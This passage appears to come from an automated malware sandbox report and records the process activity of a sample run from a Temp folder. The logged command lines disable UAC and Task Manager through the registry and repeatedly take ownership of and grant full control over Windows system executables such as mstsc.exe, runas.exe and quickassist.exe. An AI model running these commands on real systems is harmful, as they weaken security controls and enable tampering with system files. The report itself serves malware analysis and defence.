PID 2084 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

